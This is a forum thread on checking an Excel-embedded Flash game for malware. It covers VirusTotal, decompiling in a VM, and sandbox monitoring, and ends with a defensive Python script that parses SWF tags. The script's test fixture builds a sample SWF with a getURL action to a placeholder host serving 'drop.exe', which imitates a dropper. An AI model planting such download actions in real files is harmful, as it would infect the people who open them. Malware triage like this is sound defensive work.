How To Identify Malicious Code In Flash Objects?


Lupius


So the other day my mom forwarded me a chain email with an Excel attachment, saying it's a game. I opened it without giving it much thought and found out it was a Flash game embedded inside. Because I can't think of a good reason for anyone to put Flash in Excel, I got suspicious of it and discovered that this is a known method of trojan attack.

Now, this exploit was discovered and patched years ago and I'm pretty sure my Excel 2010 with the latest updates handled it safely. The question is, how do I find out if there was malicious code in that file to begin with? What tools can I use to prove my suspicions?


Upload it to VirusTotal.

I've never had much luck on VirusTotal with SWF files. EXEs, yes, but SWF files seem to get no hits on anything. Most virus scanners will ignore malicious SWF files altogether unless there are specific signatures for some major threat, or the file has a payload in plain text. SWF files generally need to be decompiled first before you can examine what is in them.

@Lupius, if you want to look through them yourself, it's best to do so in a VM or sandbox of some sort where you don't care about what happens to the system, either by 1 - decompiling in a VM (e.g. HP SWF Scanner or SoFlash's Decompiler; SoFlash uses ActiveX and will execute the payload, so do it in a VM or sandbox), or 2 - running it against a clean VM snapshot and comparing the changes made to the system afterwards, monitoring any new traffic it created with something like Wireshark, etc.

There is also http://www.flashprobe.com/ and CWSandbox (I think it's now GFI Malware something or other, though).

Some more info on this sort of attack:

http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=21890

http://news.cnet.com/8301-27080_3-20051071-245.html

Edited by digip

Finding out whether a file is malicious or not is the hardest part. You can't tell if the file is infected or not just by looking at it.

One way to tell is by uploading it to VirusTotal, as suggested by Sparda.

Or install a good AV such as Avast; for instance, it will alert you and delete the file if it finds it to be infected.


Not that you shouldn't check the file for viruses to be safe, but I wouldn't be too worried.

You said you couldn't find a legitimate reason a game was embedded in the Excel file. That's the easy part.

I just recently worked on the helpdesk at a manufacturing plant for one of the major car companies. People would hide games in Excel files to get away with being able to play them. Since the websites that host the games are blocked, they would have to have a local copy. No one would suspect the Excel files unless they were named something conspicuous.

However, that's not to say it definitely isn't malicious, rather an explanation as to why it exists.


Personally, I wouldn't trust any SWF file embedded in an Excel file. The easiest way to know: ask the sender if they even sent you the file. No matter who it's from, make sure they are the one who sent you the attachment, and even then, ask them where they got it.

It's a known trick for getting past filters in corporate networks, and it's also how RSI got hacked last year, so do your homework before running ANYTHING.


I agree. A sandbox or even a VM will do the job of preventing the infection from spreading to your computer. That's the best way to contain the infection or prevent it from spreading to your main system altogether.


Thanks for all the replies!

I did set up a VM and extracted the flash file in it. Decompiled it with Flash Decompiler Trillix and couldn't find anything foul with the scripts in the file (it was all written in Portuguese anyway).

I guess the moral of the story is, I'm glad I finally came up with a scare story that will stop my mom from forwarding chain emails.

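The static side of what digip and Lupius describe above (pull the SWF out of the Office file, decompress it, and see which tags actually carry ActionScript before reaching for a decompiler) can be done with a few dozen lines of Python. The script below is an added example, not code from the thread or from any of the tools mentioned. It builds its own constructed sample: a tiny SWF with a DoABC tag (AS3 bytecode stub) and a DoAction tag containing an ActionGetURL to a dummy host, wrapped in a fake OLE-style blob. It assumes the SWF bytes are contiguous in the blob; a real .xls keeps the ActiveX object in an OLE stream that can be fragmented, so extract that stream first (for example with olefile) and scan the result. LZMA-compressed (ZWS) files are deliberately not handled.

```python
"""Static triage of a Flash (SWF) object carved from an Office file.

Added example for this thread, with a constructed sample. It does not
represent the OP's file, Trillix, HP SWF Scanner or any other tool.
"""
import re
import struct
import zlib

# Tag codes from the SWF file format specification. Script tags carry ActionScript.
SCRIPT_TAGS = {12: "DoAction", 59: "DoInitAction", 72: "DoABC (no header)", 82: "DoABC"}
TAG_NAMES = {0: "End", 1: "ShowFrame", 9: "SetBackgroundColor", 69: "FileAttributes", **SCRIPT_TAGS}
URL_RE = re.compile(rb"(?:https?|ftp)://[\x21-\x7e]+")


def carve_swf(blob):
    """Return (offset, bytes) for every plausible SWF header found in blob."""
    out = []
    for m in re.finditer(rb"[FCZ]WS", blob):
        off = m.start()
        if off + 8 > len(blob):
            continue
        version = blob[off + 3]
        length = struct.unpack_from("<I", blob, off + 4)[0]
        # FileLength counts the uncompressed file, header included; an
        # uncompressed (FWS) file cannot claim more bytes than remain.
        if not 1 <= version <= 50 or length < 21:
            continue
        if blob[off] == ord("F") and length > len(blob) - off:
            continue
        out.append((off, blob[off:]))
    return out


def parse_swf(data):
    """Return (version, compressed, [(tag_code, tag_body), ...])."""
    sig, version, length = data[:3], data[3], struct.unpack_from("<I", data, 4)[0]
    if sig == b"FWS":
        body = data[8:length]
    elif sig == b"CWS":
        # decompressobj tolerates trailing container bytes after the zlib stream
        body = zlib.decompressobj().decompress(data[8:])[: length - 8]
    else:
        raise ValueError("unsupported signature %r (ZWS/LZMA not handled here)" % sig)
    nbits = body[0] >> 3                        # RECT: UB[5] Nbits, then 4 x SB[Nbits]
    pos = (5 + 4 * nbits + 7) // 8 + 4          # skip RECT, FrameRate u16, FrameCount u16
    tags = []
    while pos + 2 <= len(body):
        code_and_len = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, tlen = code_and_len >> 6, code_and_len & 0x3F
        if tlen == 0x3F:                        # long form: explicit u32 length follows
            tlen = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        tags.append((code, body[pos:pos + tlen]))
        pos += tlen
        if code == 0:
            break
    return version, sig == b"CWS", tags


def triage(data):
    """Summarise which tags a decompiler would need to look at, plus any embedded URLs."""
    version, compressed, tags = parse_swf(data)
    report = {"version": version, "compressed": compressed,
              "tags": [TAG_NAMES.get(c, "tag%d" % c) for c, _ in tags],
              "script_tags": [], "urls": []}
    for code, body in tags:
        if code in SCRIPT_TAGS:
            report["script_tags"].append((SCRIPT_TAGS[code], len(body)))
            report["urls"] += [u.decode("ascii") for u in URL_RE.findall(body)]
    return report


def _tag(code, body):
    """Encode a tag record header (short or long form) followed by its body."""
    if len(body) >= 0x3F:
        return struct.pack("<HI", (code << 6) | 0x3F, len(body)) + body
    return struct.pack("<H", (code << 6) | len(body)) + body


def build_sample_swf(compressed):
    """Constructed sample: an AS3 bytecode stub plus an AS2 getURL to a dummy host."""
    url = b"http://example.invalid/drop.exe"                    # constructed, not real
    get_url = b"\x83" + struct.pack("<H", len(url) + 2) + url + b"\x00" + b"\x00"
    abc_stub = struct.pack("<I", 1) + b"frame1\x00" + b"\x10\x00\x2e\x00" + b"\x00" * 8
    body = (b"\x08\x00"                          # RECT with Nbits=1, all fields zero
            + struct.pack("<HH", 12 << 8, 1)     # 12 fps, 1 frame
            + _tag(69, b"\x08\x00\x00\x00")      # FileAttributes: ActionScript3 flag
            + _tag(9, b"\xff\xff\xff")           # SetBackgroundColor
            + _tag(82, abc_stub)                 # DoABC
            + _tag(12, get_url + b"\x00")        # DoAction: ActionGetURL, ActionEnd
            + _tag(1, b"") + _tag(0, b""))       # ShowFrame, End
    header = (b"CWS" if compressed else b"FWS") + bytes([10]) + struct.pack("<I", 8 + len(body))
    return header + (zlib.compress(body) if compressed else body)


def build_container():
    """Fake OLE-style blob (constructed): magic, padding, the SWF, trailing padding."""
    return b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24 + build_sample_swf(True) + b"\x00" * 16


if __name__ == "__main__":
    for off, data in carve_swf(build_container()):
        print("SWF at offset %d: %s" % (off, triage(data)))
```

Run it against a stream you pulled from the .xls instead of `build_container()` and the report tells you whether there is any script in the object at all, and where a decompiler should look; a game with no DoAction/DoABC tags and no URLs in its script bodies is a much less interesting file than one whose script tags reference an external executable. None of this executes the SWF, which is the point: the VM or sandbox is for the dynamic run digip describes, not for reading the tag list.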
